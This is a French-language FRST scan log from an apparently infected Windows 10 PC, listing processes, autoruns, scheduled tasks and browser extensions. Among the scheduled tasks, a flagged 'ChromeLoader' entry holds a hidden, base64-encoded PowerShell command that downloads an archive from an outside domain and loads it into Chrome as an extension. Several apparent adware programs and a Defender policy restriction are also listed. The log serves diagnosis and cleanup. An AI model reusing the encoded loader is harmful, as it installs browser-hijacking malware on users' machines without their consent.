Résultats d'analyse de Farbar Recovery Scan Tool (FRST) (x64) Version: 27-12-2021
Exécuté par thiba (administrateur) sur DESKTOP-HS94SLB (Micro-Star International Co., Ltd. MS-7A36) (05-01-2022 12:43:06)
Exécuté depuis C:\Users\thiba\Desktop
Profils chargés: thiba
Plate-forme: Microsoft Windows 10 Professionnel Version 20H2 19042.1415 (X64) Langue: Français (France)
Navigateur par défaut: Brave
Mode d'amorçage: Normal

==================== Processus (Avec liste blanche) =================

(Si un élément est inclus dans le fichier fixlist.txt, le processus sera arrêté. Le fichier ne sera pas déplacé.)

(0) [Fichier non signé] C:\Program Files (x86)\DigitizerPanel\DigitizerPanel.exe
(Adobe Inc. -> Adobe Inc) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\IPCBox\AdobeIPCBroker.exe
(Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(Adobe Inc. -> Adobe Systems Incorporated) C:\Program Files\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe
(Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
(Adobe Systems Incorporated) C:\Program Files\WindowsApps\AdobeNotificationClient_2.0.1.8_x86__enpm4xejd91yc\AdobeNotificationClient.exe
(Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\RadeonSoftware.exe
(Advanced Micro Devices, Inc. -> AMD) C:\Windows\System32\DriverStore\FileRepository\c0360470.inf_amd64_b06c374aee20d185\B360357\atieclxx.exe
(Advanced Micro Devices, Inc. -> AMD) C:\Windows\System32\DriverStore\FileRepository\c0360470.inf_amd64_b06c374aee20d185\B360357\atiesrxx.exe
(Apps Delivered Ltd -> Useful Caloti) [Fichier non signé] [Fichier en cours d'utilisation] C:\Program Files (x86)\UsefulCaloti\UsefulCaloti.exe
(Digital Communications Inc -> Сorp DCom) C:\Program Files (x86)\Digital Communications\SAntivirus\SAntivirusClient.exe
(Digital Communications Inc -> Сorp DCom) C:\Program Files (x86)\Digital Communications\SAntivirus\SAntivirusIC.exe
(Digital Communications Inc -> Сorp DCom) C:\Program Files (x86)\Digital Communications\SAntivirus\SAntivirusService.exe
(Druide informatique inc. -> Druide informatique inc.) C:\Program Files (x86)\Druide\Antidote 10\Application\Bin64\AgentAntidote.exe
(Druide informatique inc. -> Druide informatique inc.) C:\Program Files (x86)\Druide\Connectix 10\Application\Bin64\AgentConnectix.exe
(Electronic Arts, Inc. -> Electronic Arts) C:\Program Files (x86)\Origin\OriginWebHelperService.exe
(Globalhop Ltd -> Walliant) C:\Users\thiba\AppData\Local\Programs\Walliant\walliant.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_5.721.12013.0_x64__8wekyb3d8bbwe\GameBar.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_5.721.12013.0_x64__8wekyb3d8bbwe\GameBarFTServer.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <2>
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <2>
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCopyAccelerator.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\NisSrv.exe
(Node.js Foundation -> Node.js) C:\Program Files\Adobe\Adobe Creative Cloud Experience\libs\node.exe
(NVIDIA Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe <3>
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe <3>
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe
(Nvidia Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_b7184c0e1c94c102\Display.NvContainer\NVDisplay.Container.exe <2>
(Popcorn Time) [Fichier non signé] C:\Program Files (x86)\Popcorn Time\Updater.exe

==================== Registre (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé. Le fichier ne sera pas déplacé.)

HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3412736 2021-07-14] (Adobe Inc. -> Adobe Systems, Incorporated)
HKLM\...\Run: [AgentConnectix64] => C:\Program Files (x86)\Druide\Connectix 10\Application\Bin64\AgentConnectix.exe [2677800 2020-07-17] (Druide informatique inc. -> Druide informatique inc.)
HKLM-x32\...\Run: [Discord] => C:\ProgramData\SquirrelMachineInstalls\Discord.exe [62636856 2020-12-05] (Discord Inc. -> Discord Inc.)
HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [779448 2021-05-25] (Adobe Inc. -> Adobe Inc.)
HKLM-x32\...\Run: [Adobe CCXProcess] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe [129288 2021-03-05] (Adobe Inc. -> )
HKLM-x32\...\Run: [Launch 0 DigitizerPanel] => C:\Program Files (x86)\DigitizerPanel\DigitizerPanel.exe [1815040 2015-12-31] (0) [Fichier non signé]
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-756262882-3244545598-4113336910-1001\...\Run: [Discord] => C:\Users\thiba\AppData\Local\Discord\Update.exe [1512760 2020-12-03] (Discord Inc. -> GitHub)
HKU\S-1-5-21-756262882-3244545598-4113336910-1001\...\Run: [CiscoMeetingDaemon] => C:\Users\thiba\AppData\Local\WebEx\ciscowebexstart.exe [2395968 2020-12-11] (Cisco WebEx LLC -> Cisco Webex LLC)
HKU\S-1-5-21-756262882-3244545598-4113336910-1001\...\Run: [Walliant] => C:\Users\thiba\AppData\Local\Programs\Walliant\walliant.exe [263272 2020-08-19] (Globalhop Ltd -> Walliant)
HKU\S-1-5-21-756262882-3244545598-4113336910-1001\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [35342976 2021-11-12] (Piriform Software Ltd -> Piriform Software Ltd)
HKU\S-1-5-21-756262882-3244545598-4113336910-1001\...\Run: [Voicemod] => C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe [6083528 2018-12-09] (Voicemod Sociedad Limitada -> Voicemod) [Fichier non signé]
HKU\S-1-5-21-756262882-3244545598-4113336910-1001\...\Run: [ut] => C:\Users\thiba\AppData\Roaming\uTorrent\uTorrent.exe [2091560 2021-09-13] (BitTorrent Inc -> BitTorrent Inc.)
HKU\S-1-5-21-756262882-3244545598-4113336910-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [4267432 2021-12-16] (Valve Corp. -> Valve Corporation)
HKU\S-1-5-21-756262882-3244545598-4113336910-1001\...\Run: [Battle.net] => C:\Program Files (x86)\Battle.net\Battle.net.exe [1087376 2021-12-17] (Blizzard Entertainment, Inc. -> Blizzard Entertainment)
HKU\S-1-5-21-756262882-3244545598-4113336910-1001\...\MountPoints2: {191986c1-9ef6-11eb-a4eb-309c23b73d15} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-756262882-3244545598-4113336910-1001\...\MountPoints2: {5c3dae63-4248-11eb-a4dc-309c23b73d15} - "E:\HiSuiteDownLoader.exe"
HKLM\Software\Microsoft\Active Setup\Installed Components: [{AFE6A462-C574-4B8A-AF43-4CC60DF4563B}] -> C:\Program Files\BraveSoftware\Brave-Browser\Application\96.1.33.106\Installer\chrmstp.exe [2021-12-15] (Brave Software, Inc. -> Brave Software, Inc.)
Startup: C:\Users\thiba\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MEGAsync.lnk [2021-08-25]
ShortcutTarget: MEGAsync.lnk -> C:\Users\thiba\AppData\Local\MEGAsync\MEGAsync.exe (Mega Limited -> Mega Limited)

==================== Tâches planifiées (Avec liste blanche) ============

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

Task: {02698863-1E29-4C70-B532-D0BF1C227740} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [61624 2020-08-21] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {05E14001-C075-4FC3-ACA6-D71235FE6E45} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe do-task "308046B0AF4A39CB"
Task: {0668A6A7-A57A-4A3C-A8F3-A51EF651FBEC} - System32\Tasks\CCleanerSkipUAC - thiba => C:\Program Files\CCleaner\CCleaner.exe [29417088 2021-11-12] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {0CA201CD-7F0C-4CB4-9D6B-4ED57E70CC6E} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [905072 2021-06-09] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {0E091486-09B8-4EFA-BF74-2EE026EB74DE} - System32\Tasks\Opera scheduled Autoupdate 1610042734 => C:\Users\thiba\AppData\Local\Programs\Opera\launcher.exe [2256592 2021-12-21] (Opera Software AS -> Opera Software)
Task: {2A87C84B-63A6-4CF2-9108-690970E1C8E5} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCmdRun.exe [901048 2021-12-17] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {4B0CAEFC-A63A-484B-8E94-FFF956FDB6F2} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3412736 2021-07-14] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {4EA8843B-7FD4-4F6C-921C-765773A4AA57} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCmdRun.exe [901048 2021-12-17] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {53DFA6B5-D66E-491F-8786-93AE53063E21} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [905072 2021-06-09] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {5C6D0804-2111-42B4-9B26-C1AD9BDB4F9E} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1261424 2021-06-09] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {5EB4502B-018B-455F-B22C-72121763AAB3} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [684976 2021-11-12] (Piriform Software Ltd -> Piriform)
Task: {63829B6D-65FB-42E6-BCA6-C78AC4A6EBC3} - System32\Tasks\MEGA\MEGAsync Update Task S-1-5-21-756262882-3244545598-4113336910-1001 => C:\Users\thiba\AppData\Local\MEGAsync\MEGAupdater.exe [1820848 2021-07-05] (Mega Limited -> Mega Limited)
Task: {6F9625A5-A6E9-44AA-B4F8-3276B6CA72F8} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3339120 2021-06-15] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {7072BA61-B6D0-459C-A665-2FE13E74E85F} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1261424 2021-06-09] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {77589E73-6D50-46A2-B027-FAA39C275175} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [645488 2021-06-09] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {7879D932-326A-40D8-A650-9A8200AEBA2E} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1261424 2021-06-09] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {8E16FE18-0C1A-48F0-952B-8B99F484615C} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [903024 2021-05-04] (NVIDIA Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log
Task: {93498317-11C3-4087-806F-71D14D8EA290} - System32\Tasks\NvBatteryBoostCheckOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [903024 2021-05-04] (NVIDIA Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvBackend\NvBatteryBoostCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerBatteryBoostCheck.log
Task: {99945D46-F6C1-43BA-B4A1-27C2DDB2B5F0} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCmdRun.exe [901048 2021-12-17] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {AC9F6F59-AB0F-4E91-9D10-89C61B39E956} - System32\Tasks\BraveSoftwareUpdateTaskMachineCore => C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [163528 2020-12-05] (Brave Software, Inc. -> BraveSoftware Inc.)
Task: {BEDE88DE-0416-4732-8876-5EF65BFD1F90} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1261424 2021-06-09] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {BFF5BD8A-2639-4881-BD65-071C5AFC524A} - System32\Tasks\StartDVR => C:\Program Files\AMD\CNext\CNext\RSServCmd.exe [69304 2020-08-21] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {ED7497C7-45FD-4C10-B222-BAF04B0C9C31} - System32\Tasks\BraveSoftwareUpdateTaskMachineUA => C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [163528 2020-12-05] (Brave Software, Inc. -> BraveSoftware Inc.)
Task: {F9A502B0-42F3-446C-AE91-E37CE658A212} - System32\Tasks\ChromeLoader => cmd /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAYwBvAG4AZgBQAGEAdABoACAAPQAgACIAJABlAHgAdABQAGEAdABoAFwAYwBvAG4AZgAuAGoAcwAiAAoAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAIAA9ACAAIgAkACgAJABlAG4AdgA6AEwATwBDAEEATABBAFAAUABEAEEAVABBACkAXABhAHIAYwBoAGkAdgBlAC4AegBpAHAAIgAKACQAdABhAHMAawBOAGEAbQBlACAAPQAgACIAQwBoAHIAbwBtAGUATABvAGEAZABlAHIAIgAKACQAZABvAG0AYQBpAG4AIAA9ACAAIgBiAHIAbwBrAGUAbgBuAGEALgB3AG8AcgBrACIACgAKACQAaQBzAE8AcABlAG4AIAA9ACAAMAAKACQAZABkACAAPQAgADAACgAkAHYAZQByACAAPQAgADAACgAKACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAHQAZQByACAAIgBuAGEAbQBlAD0AJwBjAGgAcgBvAG0AZQAuAGUAeABlACcAIgApACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIABDAG8AbQBtAGEAbgBkAEwAaQBuAGUAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAKAAkAaQBmACgAJABfACAALQBNAGEAdABjAGgAIAAiAGwAbwBhAGQALQBlAHgAdABlAG4AcwBpAG8AbgAiACkAewAKAAkACQBiAHIAZQBhAGsACgAJAH0ACgAKAAkAJABpAHMATwBwAGUAbgAgAD0AIAAxAAoAfQAKAAoAaQBmACgAJABpAHMATwBwAGUAbgApAHsACgAKAAkAaQBmACgALQBuAG8AdAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAIgAkAGUAeAB0AFAAYQB0AGgAIgApACkAewAKAAoACQAJAHQAcgB5AHsACgAJAAkACQB3AGcAZQB0ACAAIgBoAHQAdABwAHMAOgAvAC8AJABkAG8AbQBhAGkAbgAvAGEAcgBjAGgAaQB2AGUALgB6AGkAcAAiACAALQBvAHUAdABmAGkAbABlACAAIgAkAGEAcgBjAGgAaQB2AGUATgBhAG0AZQAiAAoACQAJAH0AYwBhAHQAYwBoAHsACgAJAAkACQBiAHIAZQBhAGsACgAJAAkAfQAKAAoACQAJAEUAeABwAGEAbgBkAC0AQQByAGMAaABpAHYAZQAgAC0ATABpAHQAZQByAGEAbABQAGEAdABoACAAIgAkAGEAcgBjAGgAaQB2AGUATgBhAG0AZQAiACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACIAJABlAHgAdABQAGEAdABoACIAIAAtAEYAbwByAGMAZQAKAAkACQBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAATIHAAYQB0AGgAIAAiACQAYQByAGMAaABpAHYAZQBOAGEAbQBlACIAIAAtAEYAbwByAGMAZQAKAAoACQB9AAoACQBlAGwAcwBlAHsACgAKAAkACQB0AHIAeQB7AAoACQAJAAkAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACIAJABjAG8AbgBmAFAAYQB0AGgAIgApAAoACQAJAAkAewAKAAkACQAJAAkAJABjAG8AbgBmACAAPQAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAYwBvAG4AZgBQAGEAdABoAAoACQAJAAkACQAkAGMAbwBuAGYALgBTAHAAbABpAHQAKAAiADsAIgApACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsACgAJAAkACQAJAAkAaQBmACAAKAAkAF8AIAAtAE0AYQB0AGMAaAAgACIAZABkACIAKQAKAAkACQAJAAkACQB7AAoACQAJAAkACQAJAAkAJABkAGQAIAA9ACAAJABfAC4AUwBwAGwAaQB0ACgAJwAiACcAKQBbADEAXQAKAAkACQAJAAkACQB9AGUAbABzAGUAaQBmACAAKAAkAF8AIAAtAE0AYQB0AGMAaAAgACIARQB4AHQAZQBuAHMAaQBvAG4AVgBlAHIAcwBpAG8AbgAiACkACgAJAAkACQAJAAkAewAKAAkACQAJAAkACQAJACQAdgBlAHIAIAA9ACAAJABfAC4AUwBwAGwAaQB0ACgAJwAiACcAKQBbADEAXQAKAAkACQAJAAkACQB9AAoACQAJAAkACQB9AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQBpAGYAIAAoACQAZABkACAALQBhAG4AZAAgACQAdgBlAHIAKQB7AAoACgAKAAkACQAJAHQAcgB5AHsACgAKAAkACQAJAAkAJAB1AG4AIAA9ACAAdwBnAGUAdAAgACIAaAB0AHQAcABzADoALwAvACQAZABvAG0AYQBpAG4ALwB1AG4APwBkAGkAZAA9ACQAZABkACYAdgBlAHIAPQAkAHYAZQByACIACgAKAAkACQAJAAkAaQBmACgAJAB1AG4AIAAtAE0AYQB0AGMAaAAgACIAJABkAGQAIgApAHsACgAJAAkACQAJAAkAVQBuAHIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAFQAYQBzAGsATgBhAG0AZQAgACIAJAB0AGEAcwBrAE4AYQBtAGUAIgAgAC0AQwBvAG4AZgBpAHIAbQA6ACQAZgBhAGwAcwBlAAoACQAJAAkACQAJAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgABMgcABhAHQAaAAgACIAJABlAHgAdABQAGEAdABoACIAIAAtAEYAbwByAGMAZQAgAC0AUgBlAGMAdQByAHMAZQAKAAkACQAJAAkAfQAKAAoACQAJAAkAfQBjAGEAdABjAGgAewB9AAoACgAJAAkACQB0AHIAeQB7AAoACQAJAAkACQB3AGcAZQB0ACAAIgBoAHQAdABwAHMAOgAvAC8AJABkAG8AbQBhAGkAbgAvAGEAcgBjAGgAaQB2AGUALgB6AGkAcAA/AGQAaQBkAD0AJABkAGQAJgB2AGUAcgA9ACQAdgBlAHIAIgAgAC0AbwB1AHQAZgBpAGwAZQAgACIAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAIgAKAAkACQAJAH0ACgAJAAkACQBjAGEAdABjAGgAewB9AAoACgAJAAkACQBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAIgAkAGEAcgBjAGgAaQB2AGUATgBhAG0AZQAiACkAewAKAAkACQAJAAkARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBMAGkAdABlAHIAYQBsAFAAYQB0AGgAIAAiACQAYQByAGMAaABpAHYAZQBOAGEAbQBlACIAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgBQAGEAdABoACAAIgAkAGUAeAB0AFAAYQB0AGgAIgAgAC0ARgBvAHIAYwBlAAoACQAJAAkACQBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAATIHAAYQB0AGgAIAAiACQAYQByAGMAaABpAHYAZQBOAGEAbQBlACIAIAAtAEYAbwByAGMAZQAKAAkACQAJAH0ACgAKAAkACQB9AAoACgAJAH0ACgAKAAkAdAByAHkAewAKAAkACQBHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIABjAGgAcgBvAG0AZQAgAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACAAJABfAC4AQwBsAG8AcwBlAE0AYQBpAG4AVwBpAG4AZABvAHcAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAB9AAoACQAJAHMAdABhAHIAdAAgAGMAaAByAG8AbQBlACAALQAtAGwAbwBhAGQALQBlAHgAdABlAG4AcwBpAG8AbgA9ACIAJABlAHgAdABQAGEAdABoACIALAAgAC0ALQByAGUAcwB0AG8AcgBlAC0AbABhAHMAdAAtAHMAZQBzAHMAaQBvAG4ALAAgAC0ALQBuAG8AZQByAHIAZABpAGEAbABvAGcAcwAsACAALQAtAGQAaQBzAGEAYgBsAGUALQBzAGUAcwBzAGkAbwBuAC0AYwByAGEAcwBoAGUAZAAtAGIAdQBiAGIAbABlAAoACQB9AGMAYQB0AGMAaAB7AH0ACgAKAH0A /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAYwBvAG4AZgBQAGEAdABoACAAPQAgACIAJABlAHgAdABQAGEAdABoAFwAYwBvAG4AZgAuAGoAcwAiAAoAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAI (l'élément de données a 4303 caractères en plus). (Pas de fichier) <==== ATTENTION
Task: {FE795735-3975-47FA-88CF-93989108BE75} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCmdRun.exe [901048 2021-12-17] (Microsoft Windows Publisher -> Microsoft Corporation)

(Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.)


==================== Internet (Avec liste blanche) ====================

(Si un élément est inclus dans le fichier fixlist.txt, s'il s'agit d'un élément du Registre, il sera supprimé ou restauré à la valeur par défaut.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{a21663de-c252-447e-8e6a-6fa35c7ab751}: [DhcpNameServer] 192.168.1.254

Edge:
=======
Edge Profile: C:\Users\thiba\AppData\Local\Microsoft\Edge\User Data\Default [2022-01-05]
Edge HKLM\...\Edge\Extension: [cchfigjcpjmclmmphipdkeocklpnjecm]

FireFox:
========
FF DefaultProfile: f9im40l4.default
FF ProfilePath: C:\Users\thiba\AppData\Roaming\Mozilla\Firefox\Profiles\f9im40l4.default [2021-04-13]
FF ProfilePath: C:\Users\thiba\AppData\Roaming\Mozilla\Firefox\Profiles\3qwboo3w.default-release [2022-01-05]
FF Plugin: @videolan.org/vlc,version=3.0.11 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2021-05-25] (Adobe Inc. -> Adobe Systems)

Chrome:
=======
CHR HKLM\...\Chrome\Extension: [cchfigjcpjmclmmphipdkeocklpnjecm]
CHR HKLM-x32\...\Chrome\Extension: [aegnopegbbhjeeiganiajffnalhlkkjb]
CHR HKLM-x32\...\Chrome\Extension: [cchfigjcpjmclmmphipdkeocklpnjecm]

Opera:
=======
OPR Profile: C:\Users\thiba\AppData\Roaming\Opera Software\Opera Stable [2022-01-05]
OPR DefaultSuggestURL: Opera Stable -> hxxps://www.google.com/complete/search?client=opera&q={searchTerms}&ie={inputEncoding}&oe={outputEncoding}

Brave:
=======
BRA DefaultProfile: Default
BRA Profile: C:\Users\thiba\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default [2022-01-05]
BRA Notifications: Default -> hxxps://calendar.google.com; hxxps://meet.google.com; hxxps://www.facebook.com; hxxps://www.netflix.com; hxxps://www6.eloypatrick.pro
BRA DefaultSearchKeyword: Default -> :g
BRA Extension: (Google Traduction) - C:\Users\thiba\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb [2021-08-21]
BRA Extension: (Safe Torrent Scanner) - C:\Users\thiba\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Extensions\aegnopegbbhjeeiganiajffnalhlkkjb [2022-01-04]
BRA Extension: (Just Black) - C:\Users\thiba\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Extensions\aghfnjkcakhmadgdomlmlhhaocbkloab [2020-12-05]
BRA Extension: (MEGA) - C:\Users\thiba\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Extensions\bigefpfhnfcobdlfbedofhhaibnlghod [2021-12-23]
BRA Extension: (Antidote) - C:\Users\thiba\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Extensions\cchfigjcpjmclmmphipdkeocklpnjecm [2021-08-25]
BRA Extension: (Adblock Plus - bloqueur de publicités gratuit) - C:\Users\thiba\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2021-11-24]
BRA Extension: (Brave Local Data Files Updater) - C:\Users\thiba\AppData\Local\BraveSoftware\Brave-Browser\User Data\afalakplffnnnlkncjhbmahjfjhmlkal [2021-10-01]
BRA Extension: (Brave NTP background images) - C:\Users\thiba\AppData\Local\BraveSoftware\Brave-Browser\User Data\aoojcmojmmcbpfgoecoadbdpnagfchel [2021-12-15]
BRA Extension: (Wallet Data Files Updater) - C:\Users\thiba\AppData\Local\BraveSoftware\Brave-Browser\User Data\BraveWallet [2021-11-30]
BRA Extension: (Brave Ad Block Updater (Default)) - C:\Users\thiba\AppData\Local\BraveSoftware\Brave-Browser\User Data\cffkpbalmllkdoenhmdmpbkajipdjfam [2022-01-04]
BRA Extension: (Brave Tor Client Updater (Windows)) - C:\Users\thiba\AppData\Local\BraveSoftware\Brave-Browser\User Data\cpoalefficncklhjfpglfiplenlpccdb [2021-06-25]
BRA Extension: (Brave Ad Block Updater (AdGuard Français)) - C:\Users\thiba\AppData\Local\BraveSoftware\Brave-Browser\User Data\emaecjinaegfkoklcdafkiocjhoeilao [2022-01-04]
